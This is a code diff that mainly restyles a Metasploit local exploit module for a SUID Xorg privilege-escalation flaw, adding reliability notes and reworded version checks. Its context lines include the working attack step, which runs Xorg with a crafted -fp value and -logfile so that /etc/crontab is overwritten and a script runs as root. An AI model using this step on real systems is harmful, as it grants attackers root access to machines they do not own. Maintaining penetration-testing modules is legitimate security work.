@@ -87,6 +87,11 @@ class MetasploitModule < Msf::Exploit::Local
           'WfsDelay' => 120
         },
         'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -108,60 +113,58 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     # linux checks
-    uname = cmd_exec "uname"
+    uname = cmd_exec('uname')
     if uname =~ /linux/i
-      vprint_status "Running additional check for Linux"
+      vprint_status 'Running additional check for Linux'
       if datastore['ConsoleLock']
-        user = cmd_exec "id -un"
-        unless exist? "/var/run/console/#{user}"
-          vprint_error "No console lock for #{user}"
+        user = cmd_exec('id -un')
+        unless exist?("/var/run/console/#{user}")
+          vprint_error("No console lock for #{user}")
           return CheckCode::Safe
         end
-        vprint_good "Console lock for #{user}"
+        vprint_good("Console lock for #{user}")
       end
-      if selinux_installed?
-        if selinux_enforcing?
-          vprint_error 'Selinux is enforcing'
-          return CheckCode::Safe
-        end
-      end
-      vprint_good "Selinux is not an issue"
+
+      return CheckCode::Safe('SELinux is enforcing') if selinux_installed? && selinux_enforcing?
+
+      vprint_good('SELinux is not an issue')
     end
 
     # suid program check
-    xorg_path = cmd_exec "command -v Xorg"
-    unless xorg_path.include?("Xorg")
-      vprint_error "Could not find Xorg executable"
-      return CheckCode::Safe
+    xorg_path = cmd_exec('command -v Xorg')
+    unless xorg_path.include?('Xorg')
+      return CheckCode::Safe('Could not find Xorg executable')
     end
-    vprint_good "Xorg path found at #{xorg_path}"
-    unless setuid? xorg_path
-      vprint_error "Xorg binary #{xorg_path} is not SUID"
-      return CheckCode::Safe
+
+    vprint_good("Xorg path found at #{xorg_path}")
+
+    unless setuid?(xorg_path)
+      return CheckCode::Safe("Xorg binary #{xorg_path} is not SUID")
     end
-    vprint_good "Xorg binary #{xorg_path} is SUID"
+
+    vprint_good("Xorg binary #{xorg_path} is SUID")
 
     # version check
-    x_version = cmd_exec "Xorg -version"
-    if x_version.include?("Release Date")
+    x_version = cmd_exec 'Xorg -version'
+    if x_version.include?('Release Date')
       v = Rex::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
       unless v.between?(Rex::Version.new('1.19.0'), Rex::Version.new('1.20.2'))
         vprint_error "Xorg version #{v} not supported"
         return CheckCode::Safe
       end
-    elsif x_version.include?("Fatal server error")
-      vprint_error "User probably does not have console auth"
-      vprint_error "Below is Xorg -version output"
+    elsif x_version.include?('Fatal server error')
+      vprint_error 'User probably does not have console auth'
+      vprint_error 'Below is Xorg -version output'
       vprint_error x_version
       return CheckCode::Safe
     else
-      vprint_warning "Could not parse Xorg -version output"
+      vprint_warning('Could not parse Xorg -version output')
       return CheckCode::Appears
     end
-    vprint_good "Xorg version #{v} is vulnerable"
+    vprint_good("Xorg version #{v} is vulnerable")
 
     # process check for /X
-    proc_list = cmd_exec "ps ax"
+    proc_list = cmd_exec 'ps ax'
     if proc_list.include?('/X ')
       vprint_warning('Xorg in process list')
       return CheckCode::Appears
@@ -177,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Local
     else
       session.shell_command(@clean_up)
     end
-    print_good "Returning session after cleaning"
+    print_good 'Returning session after cleaning'
   ensure
     super
   end
@@ -220,7 +223,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status 'Trying /etc/crontab overwrite'
     cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
     Rex.sleep 5
-    cmd_exec "pkill Xorg"
+    cmd_exec 'pkill Xorg'
     Rex.sleep 1
     cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
     unless cron_check.include? pscript
